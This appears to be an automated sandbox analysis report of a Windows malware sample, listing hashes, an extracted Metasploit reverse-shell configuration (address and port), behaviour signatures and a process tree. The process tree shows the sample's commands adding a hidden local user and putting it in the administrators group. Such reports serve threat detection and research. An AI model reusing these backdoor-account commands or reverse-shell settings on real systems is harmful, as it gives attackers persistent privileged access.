Analysis
-
max time kernel
105s -
max time network
94s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
12-09-2024 23:59
Behavioral task
behavioral1
Sample
dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe
-
Size
626KB
-
MD5
dd47cdc584c1934835e2f8d3ebd55c49
-
SHA1
43fc40273dd033b2e391e6eda38f49437d477887
-
SHA256
4eb8f41983ee7f2d4c4fbc0c522015d83af600665f7202d20bab6b2fb00c88bc
-
SHA512
f776bccc9cf0dfe83caeb509835ed5884d137148bccad1d5454df6f9b90e4e6b0488c3b79432c1ff4ca333d1f4dc773d63f1813b61ea16211a3789cf0b2fc05c
-
SSDEEP
12288:KBitsaJiKq+IvmAU8e5i88xsTmOg+LuxMTWNm868Oa2hcEiP/3IWVJ/ux9cb0G:KntKq+JF8Ei88yTmr+LuxMW6E/7
Malware Config
Extracted
metasploit
windows/shell_reverse_tcp
192.168.1.253:65535
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
resource yara_rule behavioral1/memory/2024-0-0x0000000000400000-0x0000000000503000-memory.dmp upx behavioral1/memory/2024-2-0x0000000000400000-0x0000000000503000-memory.dmp upx behavioral1/memory/2024-12-0x0000000000400000-0x0000000000503000-memory.dmp upx -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Runs net.exe
-
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2024 wrote to memory of 1652 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1652 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1652 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1652 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 31 PID 1652 wrote to memory of 1668 1652 cmd.exe 32 PID 1652 wrote to memory of 1668 1652 cmd.exe 32 PID 1652 wrote to memory of 1668 1652 cmd.exe 32 PID 1652 wrote to memory of 1668 1652 cmd.exe 32 PID 1668 wrote to memory of 2544 1668 net.exe 33 PID 1668 wrote to memory of 2544 1668 net.exe 33 PID 1668 wrote to memory of 2544 1668 net.exe 33 PID 1668 wrote to memory of 2544 1668 net.exe 33 PID 2024 wrote to memory of 2584 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 34 PID 2024 wrote to memory of 2584 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 34 PID 2024 wrote to memory of 2584 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 34 PID 2024 wrote to memory of 2584 2024 dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe 34 PID 2584 wrote to memory of 2268 2584 cmd.exe 35 PID 2584 wrote to memory of 2268 2584 cmd.exe 35 PID 2584 wrote to memory of 2268 2584 cmd.exe 35 PID 2584 wrote to memory of 2268 2584 cmd.exe 35 PID 2268 wrote to memory of 1912 2268 net.exe 36 PID 2268 wrote to memory of 1912 2268 net.exe 36 PID 2268 wrote to memory of 1912 2268 net.exe 36 PID 2268 wrote to memory of 1912 2268 net.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\dd47cdc584c1934835e2f8d3ebd55c49_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net user /add pako antifa2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\net.exenet user /add pako antifa3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user /add pako antifa4⤵
- System Location Discovery: System Language Discovery
PID:2544
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup administrators pako /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\net.exenet localgroup administrators pako /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators pako /add4⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
-